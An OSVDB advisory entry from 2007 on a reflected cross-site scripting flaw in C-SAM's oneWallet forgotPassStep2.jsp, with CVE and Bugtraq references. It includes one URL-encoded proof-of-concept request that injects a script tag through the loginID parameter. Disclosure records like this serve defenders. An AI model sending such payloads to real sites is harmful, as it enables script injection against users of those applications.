oneWallet user/forgotPassStep2.jsp loginID Variable XSS

2007-08-07T00:00:00
ID OSVDB:39206
Type osvdb
Reporter OSVDB
Modified 2007-08-07T00:00:00

Description

Manual Testing Notes

http://[target]/tp/web/oneWallet/user/forgotPassStep2.jsp?loginID=null%22%3e%3cscript%3ealert(%22XSS!%22)%3c%2fscript%3e

References:

Vendor URL: http://www.c-sam.com/technology/oneWallet.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0086.html ISS X-Force ID: 35838 CVE-2007-4239 Bugtraq ID: 25224